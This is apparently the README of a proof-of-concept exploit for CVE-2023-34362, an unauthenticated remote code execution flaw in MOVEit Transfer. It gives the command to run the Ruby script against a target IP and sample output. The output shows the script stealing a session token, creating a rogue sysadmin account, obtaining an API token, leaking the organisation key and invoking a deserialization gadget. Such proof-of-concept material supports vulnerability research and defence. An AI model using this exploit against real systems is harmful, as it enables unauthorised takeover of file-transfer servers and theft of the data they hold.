CVE-2023-34362: MOVEit Transfer Unauthenticated RCE

For a full technical description of the vulnerability and exploitation, please read our AttackerKB Analysis.

Usage

    ruby move.rb

    ruby move.rb 192.168.86.111
    [+] Starting. target='https://192.168.86.111'.
    [+] Retrieved initial session token '3el524tvmjs4iceurhm1r2cq' and InstID '8937'.
    [+] Creating new sysadmin account: username='WZHTXMOU', userlogin='NMMLJIIP', password='LUOZFAIB'.
    [+] Got API access token='3k2Bs4DBE-5YhK4kBr9HoALoGm4UIsOEg-KYMC6kcB3hwtncbiW-FCrvyXu9JuLgaXBzBg9SeX-GaykQHXWE1R4FBK9G-koUKmGB4u34LNzio3mzMDPA3deCNjGVHOkeIPbHdkcH7BouMlUtFcI0PwRt2frY0z6jBxlpXwVr4GqprxTT8lBnqTRsTpq75Mw0g5WudKvqsIa7z7HH0kq7okp7OVH8M5ABWXiFQ0l2vS9ZlXMwuV9o-1LKt1_nFJjLMtUHGn6mNzMinge774X1gOXGws2Qpjl32PlmRShx2GX0yGb8NYsin_JpJeTI-6BFzS6tJbq_UFtKaoND9WH4oZS5sLW2SHlRPNsJIfBrsi6fYKRLewKThQ'.
    [+] Found folderId '963580724'.
    [+] Initiated resumable file upload for fileId '966492920'…
    [+] Leaked the Org Key: 0B 52 CA 0B FA 01 6F 19 5E D3 61 B1 B9 2A DA 75
    [+] Using deserialization gadget:…